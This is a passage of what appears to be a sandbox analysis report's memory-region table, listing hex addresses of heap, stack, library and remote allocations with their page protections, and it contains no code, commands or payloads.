|
page read and write
|
||
1766C913000
|
heap
|
page read and write
|
||
1F02BA02000
|
heap
|
page read and write
|
||
7FF5ADD0F000
|
unkown
|
page readonly
|
||
3005DFF000
|
stack
|
page read and write
|
||
21845C74000
|
heap
|
page read and write
|
||
1D9DD3A6000
|
heap
|
page read and write
|
||
1D9DD443000
|
heap
|
page read and write
|
||
2474C038000
|
heap
|
page read and write
|
||
28F97F30000
|
heap
|
page read and write
|
||
1C8F4A69000
|
heap
|
page read and write
|
||
1AF6404A000
|
heap
|
page read and write
|
||
B8EF27E000
|
stack
|
page read and write
|
||
1F02BA2B000
|
heap
|
page read and write
|
||
1AF6424B000
|
heap
|
page read and write
|
||
1F02B950000
|
trusted library allocation
|
page read and write
|
||
1F3773D0000
|
trusted library allocation
|
page read and write
|
||
11A275B000
|
stack
|
page read and write
|
||
2BDFB120000
|
heap
|
page read and write
|
||
116DC22B000
|
heap
|
page read and write
|
||
1AF64060000
|
heap
|
page read and write
|
||
2474BF88000
|
heap
|
page read and write
|
||
1AF64045000
|
heap
|
page read and write
|
||
1D9DD3C1000
|
heap
|
page read and write
|
||
7FF5ADD21000
|
unkown
|
page readonly
|
||
2474BF60000
|
heap
|
page read and write
|
||
1D9DD3C6000
|
heap
|
page read and write
|
||
1D9DDF51000
|
heap
|
page read and write
|
||
23E7A5D7000
|
heap
|
page read and write
|
||
28F97ED0000
|
heap
|
page read and write
|
||
1759FE5C000
|
heap
|
page read and write
|
||
2474BFC8000
|
heap
|
page read and write
|
||
1F377402000
|
heap
|
page read and write
|
||
21845C73000
|
heap
|
page read and write
|
||
255F27F000
|
stack
|
page read and write
|
||
1D9DD410000
|
heap
|
page read and write
|
||
1D9DD41C000
|
heap
|
page read and write
|
||
21845C5E000
|
heap
|
page read and write
|
||
1AF640A6000
|
heap
|
page read and write
|
||
7FF63F525000
|
unkown
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
1C8F42F0000
|
trusted library allocation
|
page read and write
|
||
29C03DE000
|
stack
|
page read and write
|
||
16371B50000
|
heap
|
page read and write
|
||
1D9DD3D1000
|
heap
|
page read and write
|
||
23927A00000
|
heap
|
page read and write
|
||
3E1D7D000
|
stack
|
page read and write
|
||
28F98010000
|
unkown
|
page read and write
|
||
1D9DD3D3000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
1AF64243000
|
heap
|
page read and write
|
||
1F37745D000
|
heap
|
page read and write
|
||
1E0A1A4E000
|
heap
|
page read and write
|
||
1D9DD44D000
|
heap
|
page read and write
|
||
CBBF9EF000
|
stack
|
page read and write
|
||
1759FE43000
|
heap
|
page read and write
|
||
1D9DD448000
|
heap
|
page read and write
|
||
1D9DDF3B000
|
heap
|
page read and write
|
||
1C8F4A40000
|
heap
|
page read and write
|
||
1F377445000
|
heap
|
page read and write
|
||
2784FCC0000
|
heap
|
page read and write
|
||
DCD090E000
|
stack
|
page read and write
|
||
7FF63F525000
|
unkown
|
page read and write
|
||
1AF64038000
|
heap
|
page read and write
|
||
2474C003000
|
heap
|
page read and write
|
||
22232FB000
|
stack
|
page read and write
|
||
1D9DD3D1000
|
heap
|
page read and write
|
||
7FF5ADCB4000
|
unkown
|
page readonly
|
||
1D9DD416000
|
heap
|
page read and write
|
||
28F98013000
|
unkown
|
page read and write
|
||
1AF64076000
|
heap
|
page read and write
|
||
1D9DD3E6000
|
heap
|
page read and write
|
||
21845C5F000
|
heap
|
page read and write
|
||
21845C4B000
|
heap
|
page read and write
|
||
1D9DD3DE000
|
heap
|
page read and write
|
||
8EB26FE000
|
stack
|
page read and write
|
||
21845C6B000
|
heap
|
page read and write
|
||
B72D0FD000
|
stack
|
page read and write
|
||
28F98017000
|
unkown
|
page read and write
|
||
255F57C000
|
stack
|
page read and write
|
||
2784F940000
|
heap
|
page read and write
|
||
1D9DD3E8000
|
heap
|
page read and write
|
||
8EB24FB000
|
stack
|
page read and write
|
||
1D9DD635000
|
heap
|
page read and write
|
||
1AF6408A000
|
heap
|
page read and write
|
||
28F98045000
|
unkown
|
page read and write
|
||
1D9DD3E3000
|
heap
|
page read and write
|
||
1C8F4362000
|
heap
|
page read and write
|
||
1AF64247000
|
heap
|
page read and write
|
||
21845C4B000
|
heap
|
page read and write
|
||
1AF64099000
|
heap
|
page read and write
|
||
21845A80000
|
heap
|
page read and write
|
||
116DC213000
|
heap
|
page read and write
|
||
1766C82B000
|
heap
|
page read and write
|
||
4761F7D000
|
stack
|
page read and write
|
||
B72D47B000
|
stack
|
page read and write
|
||
29C02DA000
|
stack
|
page read and write
|
||
2474C035000
|
heap
|
page read and write
|
||
A56AF4A000
|
stack
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
1F02B850000
|
heap
|
page read and write
|
||
1D9DD3E8000
|
heap
|
page read and write
|
||
2474BFB9000
|
heap
|
page read and write
|
||
1AF640C0000
|
heap
|
page read and write
|
||
1766C780000
|
trusted library allocation
|
page read and write
|
||
1D9DD3E3000
|
heap
|
page read and write
|
||
1D9DD3A4000
|
heap
|
page read and write
|
||
16371B00000
|
heap
|
page read and write
|
||
1F02B9A0000
|
remote allocation
|
page read and write
|
||
1766C864000
|
heap
|
page read and write
|
||
1D9DDC55000
|
heap
|
page read and write
|
||
1AF6407B000
|
heap
|
page read and write
|
||
1F6286A0000
|
heap
|
page read and write
|
||
1D9DD42F000
|
heap
|
page read and write
|
||
36E75F9000
|
stack
|
page read and write
|
||
1D9DD3D2000
|
heap
|
page read and write
|
||
1D9DD443000
|
heap
|
page read and write
|
||
1F377400000
|
heap
|
page read and write
|
||
2474C01A000
|
heap
|
page read and write
|
||
28F982D0000
|
unkown
|
page readonly
|
||
2474BFE8000
|
heap
|
page read and write
|
||
4761DFC000
|
stack
|
page read and write
|
||
21845C00000
|
heap
|
page read and write
|
||
1D9DDF3A000
|
heap
|
page read and write
|
||
1D9DD3DD000
|
heap
|
page read and write
|
||
28F98005000
|
unkown
|
page read and write
|
||
28F9802E000
|
unkown
|
page read and write
|
||
CBBFCFF000
|
stack
|
page read and write
|
||
28F98002000
|
unkown
|
page read and write
|
||
1766C86E000
|
heap
|
page read and write
|
||
2474C045000
|
heap
|
page read and write
|
||
2474C03E000
|
heap
|
page read and write
|
||
21845C64000
|
heap
|
page read and write
|
||
1D9DD3CB000
|
heap
|
page read and write
|
||
3005B7D000
|
stack
|
page read and write
|
||
1759FE00000
|
heap
|
page read and write
|
||
222357C000
|
stack
|
page read and write
|
||
1F37744F000
|
heap
|
page read and write
|
||
1C8F496B000
|
heap
|
page read and write
|
||
21845C63000
|
heap
|
page read and write
|
||
23927A15000
|
heap
|
page read and write
|
||
21845C82000
|
heap
|
page read and write
|
||
1F3773C0000
|
trusted library allocation
|
page read and write
|
||
1D9DD412000
|
heap
|
page read and write
|
||
1F377330000
|
heap
|
page read and write
|
||
1759FE02000
|
heap
|
page read and write
|
||
21845C76000
|
heap
|
page read and write
|
||
1D9DD43E000
|
heap
|
page read and write
|
||
21845C54000
|
heap
|
page read and write
|
||
116DC332000
|
heap
|
page read and write
|
||
21845C4C000
|
heap
|
page read and write
|
||
1F02BB16000
|
heap
|
page read and write
|
||
21845C3E000
|
heap
|
page read and write
|
||
1AF6406A000
|
heap
|
page read and write
|
||
1759FCF0000
|
heap
|
page read and write
|
||
21845C66000
|
heap
|
page read and write
|
||
1D9DD3E0000
|
heap
|
page read and write
|
||
2222FAF000
|
stack
|
page read and write
|
||
1C8F44B0000
|
heap
|
page read and write
|
||
1D9DD435000
|
heap
|
page read and write
|
||
B8EEEFE000
|
stack
|
page read and write
|
||
21845C5D000
|
heap
|
page read and write
|
||
2BDF9670000
|
heap
|
page read and write
|
||
2474BF80000
|
heap
|
page read and write
|
||
3E178B000
|
stack
|
page read and write
|
||
11A307C000
|
stack
|
page read and write
|
||
1AF640B4000
|
heap
|
page read and write
|
||
1D9DDC66000
|
heap
|
page read and write
|
||
23927213000
|
heap
|
page read and write
|
||
1AF64138000
|
heap
|
page read and write
|
||
1D9DD3E8000
|
heap
|
page read and write
|
||
1D9DD3E0000
|
heap
|
page read and write
|
||
1C8F43C7000
|
heap
|
page read and write
|
||
B4CB57E000
|
stack
|
page read and write
|
||
CBBFC7F000
|
stack
|
page read and write
|
||
1F02BA00000
|
heap
|
page read and write
|
||
1D9DD3AD000
|
heap
|
page read and write
|
||
8EB23FB000
|
stack
|
page read and write
|
||
1AF6408C000
|
heap
|
page read and write
|
||
1D9DD3EF000
|
heap
|
page read and write
|
||
1AF64088000
|
heap
|
page read and write
|
||
1D9DD412000
|
heap
|
page read and write
|
||
C6EE57E000
|
stack
|
page read and write
|
||
1D9DDF37000
|
heap
|
page read and write
|
||
1E0A1A20000
|
heap
|
page read and write
|
||
23927A02000
|
heap
|
page read and write
|
||
8EB22FE000
|
stack
|
page read and write
|
||
1D9DD393000
|
heap
|
page read and write
|
||
1D9DD41B000
|
heap
|
page read and write
|
||
1C8F43B3000
|
heap
|
page read and write
|
||
1F626DA0000
|
heap
|
page read and write
|
||
1D9DD447000
|
heap
|
page read and write
|
||
8EB28FE000
|
stack
|
page read and write
|
||
1F02B9A0000
|
remote allocation
|
page read and write
|
||
1C8F49AF000
|
heap
|
page read and write
|
||
8EB227E000
|
stack
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
1D9DD435000
|
heap
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
2BDF94D0000
|
heap
|
page read and write
|
||
21845C6A000
|
heap
|
page read and write
|
||
1759FE6D000
|
heap
|
page read and write
|
||
B4CB3FE000
|
stack
|
page read and write
|
||
1C8F43D2000
|
heap
|
page read and write
|
||
21845C93000
|
heap
|
page read and write
|
||
116DC010000
|
heap
|
page read and write
|
||
3E22FD000
|
stack
|
page read and write
|
||
1AF65FF0000
|
heap
|
page read and write
|
||
239270D0000
|
heap
|
page read and write
|
||
1E0A19B0000
|
heap
|
page read and write
|
||
1AF640C0000
|
heap
|
page read and write
|
||
28F98030000
|
unkown
|
page read and write
|
||
1E0A1A40000
|
heap
|
page read and write
|
||
1D9DD43D000
|
heap
|
page read and write
|
||
1D9DD384000
|
heap
|
page read and write
|
||
1D9DD3EF000
|
heap
|
page read and write
|
||
1D9DD3E5000
|
heap
|
page read and write
|
||
1AF63F90000
|
heap
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
2392722A000
|
heap
|
page read and write
|
||
29C077E000
|
stack
|
page read and write
|
||
7FF5ADCA4000
|
unkown
|
page readonly
|
||
1D9DDC6D000
|
heap
|
page read and write
|
||
7FF63F525000
|
unkown
|
page write copy
|
||
1AF6424A000
|
heap
|
page read and write
|
||
1F02B7E0000
|
heap
|
page read and write
|
||
1C8F4961000
|
heap
|
page read and write
|
||
1E0A1D95000
|
heap
|
page read and write
|
||
21845C13000
|
heap
|
page read and write
|
||
239271D0000
|
trusted library allocation
|
page read and write
|
||
1D9DD424000
|
heap
|
page read and write
|
||
1D9DD3CC000
|
heap
|
page read and write
|
||
1766C827000
|
heap
|
page read and write
|
||
1D9DD443000
|
heap
|
page read and write
|
||
1D9DD410000
|
heap
|
page read and write
|
||
1D9DD3E3000
|
heap
|
page read and write
|
||
B72D27F000
|
stack
|
page read and write
|
||
23927300000
|
heap
|
page read and write
|
||
3E1F7B000
|
stack
|
page read and write
|
||
4761CFB000
|
stack
|
page read and write
|
||
16371BDE000
|
heap
|
page read and write
|
||
B72CEFF000
|
stack
|
page read and write
|
||
1766C902000
|
heap
|
page read and write
|
||
1C8F4320000
|
heap
|
page read and write
|
||
1766D002000
|
trusted library allocation
|
page read and write
|
||
23E7A780000
|
heap
|
page read and write
|
||
B4CB2FD000
|
stack
|
page read and write
|
||
1766C813000
|
heap
|
page read and write
|
||
2784F960000
|
heap
|
page read and write
|
||
7FF5ADD64000
|
unkown
|
page readonly
|
||
1D9DD42E000
|
heap
|
page read and write
|
||
16371D90000
|
heap
|
page read and write
|
||
21845D02000
|
heap
|
page read and write
|
||
21845C49000
|
heap
|
page read and write
|
||
2474E2A0000
|
heap
|
page read and write
|
||
1D9DD435000
|
heap
|
page read and write
|
||
28F9802C000
|
unkown
|
page read and write
|
||
4761E7F000
|
stack
|
page read and write
|
||
1D9DD3D7000
|
heap
|
page read and write
|
||
36E737F000
|
stack
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
1D9DDC56000
|
heap
|
page read and write
|
||
1D9DD3EA000
|
heap
|
page read and write
|
||
2784F9CB000
|
heap
|
page read and write
|
||
2222EAC000
|
stack
|
page read and write
|
||
B72D177000
|
stack
|
page read and write
|
||
1F02B7F0000
|
heap
|
page read and write
|
||
1AF64142000
|
heap
|
page read and write
|
||
1C8F4A8A000
|
heap
|
page read and write
|
||
116DC170000
|
trusted library allocation
|
page read and write
|
||
116DC300000
|
heap
|
page read and write
|
||
2474F7A0000
|
trusted library allocation
|
page read and write
|
||
11A2D7B000
|
stack
|
page read and write
|
||
25258B40000
|
heap
|
page read and write
|
||
21845C45000
|
heap
|
page read and write
|
||
1D9DD3CE000
|
heap
|
page read and write
|
||
1D9DD447000
|
heap
|
page read and write
|
||
2474C042000
|
heap
|
page read and write
|
||
1D9DDF49000
|
heap
|
page read and write
|
||
1D9DD421000
|
heap
|
page read and write
|
||
1F626A40000
|
heap
|
page read and write
|
||
1D9DD3A0000
|
heap
|
page read and write
|
||
1766C6F0000
|
heap
|
page read and write
|
||
222347E000
|
stack
|
page read and write
|
||
1AF64242000
|
heap
|
page read and write
|
||
1759FD70000
|
trusted library allocation
|
page read and write
|
||
28F9802B000
|
unkown
|
page read and write
|
||
1C8F43B1000
|
heap
|
page read and write
|
||
2474E0A0000
|
heap
|
page read and write
|
||
116DC200000
|
heap
|
page read and write
|
||
2222F2F000
|
stack
|
page read and write
|
||
21845C8B000
|
heap
|
page read and write
|
||
25258B90000
|
heap
|
page read and write
|
||
1D9DD443000
|
heap
|
page read and write
|
||
B4CB67E000
|
stack
|
page read and write
|
||
1D9DD610000
|
heap
|
page read and write
|
||
F5C5ACB000
|
stack
|
page read and write
|
||
1D9DD410000
|
heap
|
page read and write
|
||
1AF642B4000
|
heap
|
page read and write
|
||
28F9800E000
|
unkown
|
page read and write
|
||
1D9DDF4E000
|
heap
|
page read and write
|
||
116DC280000
|
heap
|
page read and write
|
||
28F97F41000
|
unkown
|
page readonly
|
||
1D9DD3F1000
|
heap
|
page read and write
|
||
1D9DD358000
|
heap
|
page read and write
|
||
1D9DD3B0000
|
heap
|
page read and write
|
||
116DCA02000
|
trusted library allocation
|
page read and write
|
||
1D9DD440000
|
heap
|
page read and write
|
||
1F02B9A0000
|
remote allocation
|
page read and write
|
||
1AF64247000
|
heap
|
page read and write
|
||
1D9DD3DE000
|
heap
|
page read and write
|
||
1AF64090000
|
heap
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
6260EC000
|
stack
|
page read and write
|
||
2474C065000
|
heap
|
page read and write
|
||
28F98802000
|
unkown
|
page read and write
|
||
1AF64088000
|
heap
|
page read and write
|
||
23927284000
|
heap
|
page read and write
|
||
116DC302000
|
heap
|
page read and write
|
||
21845C97000
|
heap
|
page read and write
|
||
1D9DD3F6000
|
heap
|
page read and write
|
||
1F377320000
|
heap
|
page read and write
|
||
2474C042000
|
heap
|
page read and write
|
||
21845C83000
|
heap
|
page read and write
|
||
21845C9B000
|
heap
|
page read and write
|
||
1C8F4A21000
|
heap
|
page read and write
|
||
1C8F434C000
|
heap
|
page read and write
|
||
28F98000000
|
unkown
|
page read and write
|
||
222337F000
|
stack
|
page read and write
|
||
1C8F4A64000
|
heap
|
page read and write
|
||
DCD088C000
|
stack
|
page read and write
|
||
2474BFD1000
|
heap
|
page read and write
|
||
116DC313000
|
heap
|
page read and write
|
||
1D9DD37F000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
7FF5ADC93000
|
unkown
|
page readonly
|
||
7FF5ADCA8000
|
unkown
|
page readonly
|
||
1C8F4A56000
|
heap
|
page read and write
|
||
2474BFCA000
|
heap
|
page read and write
|
||
25258B98000
|
heap
|
page read and write
|
||
2474DF30000
|
trusted library allocation
|
page read and write
|
||
B4CB4FC000
|
stack
|
page read and write
|
||
36E727B000
|
stack
|
page read and write
|
||
247500A0000
|
trusted library allocation
|
page read and write
|
||
1D9DDF37000
|
heap
|
page read and write
|
||
2474BEF0000
|
heap
|
page read and write
|
||
1D9DDF35000
|
heap
|
page read and write
|
||
3005AFD000
|
stack
|
page read and write
|
||
1AF64130000
|
heap
|
page read and write
|
||
11A2F7D000
|
stack
|
page read and write
|
||
1D9DD3DE000
|
heap
|
page read and write
|
||
2474C003000
|
heap
|
page read and write
|
||
1D9DDF54000
|
heap
|
page read and write
|
||
1AF64142000
|
heap
|
page read and write
|
||
1D9DDC5B000
|
heap
|
page read and write
|
||
1D9DD3CE000
|
heap
|
page read and write
|
||
1D9DDC53000
|
heap
|
page read and write
|
||
2474BFC2000
|
heap
|
page read and write
|
||
1759FE6F000
|
heap
|
page read and write
|
||
21845C42000
|
heap
|
page read and write
|
||
1C8F4180000
|
heap
|
page read and write
|
||
28F98022000
|
unkown
|
page read and write
|
||
1D9DD350000
|
heap
|
page read and write
|
||
3005CFC000
|
stack
|
page read and write
|
||
1AF64240000
|
heap
|
page read and write
|
||
1C8F49E9000
|
heap
|
page read and write
|
||
1D9DD3DD000
|
heap
|
page read and write
|
||
7FF5ADCE8000
|
unkown
|
page readonly
|
||
1F02BA6E000
|
heap
|
page read and write
|
||
1C8F4338000
|
heap
|
page read and write
|
||
1AF63E30000
|
heap
|
page read and write
|
||
2474BFC5000
|
heap
|
page read and write
|
||
8EB1F9B000
|
stack
|
page read and write
|
||
1D9DD416000
|
heap
|
page read and write
|
||
1AF64091000
|
heap
|
page read and write
|
||
2474E060000
|
heap
|
page read and write
|
||
1D9DD447000
|
heap
|
page read and write
|
||
1E0A1A6B000
|
heap
|
page read and write
|
||
21845C6F000
|
heap
|
page read and write
|
||
1D9DD417000
|
heap
|
page read and write
|
||
1759FF02000
|
heap
|
page read and write
|
||
2474C02C000
|
heap
|
page read and write
|
||
2474DF20000
|
heap
|
page read and write
|
||
1D9DDC5F000
|
heap
|
page read and write
|
||
1759FE4E000
|
heap
|
page read and write
|
||
1E0A1A4B000
|
heap
|
page read and write
|
||
23927070000
|
heap
|
page read and write
|
||
1766C88A000
|
heap
|
page read and write
|
||
2474C210000
|
trusted library allocation
|
page read and write
|
||
B72CDFB000
|
stack
|
page read and write
|
||
1D9DD3A2000
|
heap
|
page read and write
|
||
28F98045000
|
unkown
|
page read and write
|
||
2474C25E000
|
heap
|
page read and write
|
||
F5C5BCB000
|
stack
|
page read and write
|
||
21845B80000
|
trusted library allocation
|
page read and write
|
||
7FF5ADD14000
|
unkown
|
page readonly
|
||
1D9DD40A000
|
heap
|
page read and write
|
||
1AF63F70000
|
heap
|
page read and write
|
||
247505A0000
|
trusted library allocation
|
page read and write
|
||
1D9DD3CE000
|
heap
|
page read and write
|
||
2474C00E000
|
heap
|
page read and write
|
There are 825 hidden memdumps, click here to show them.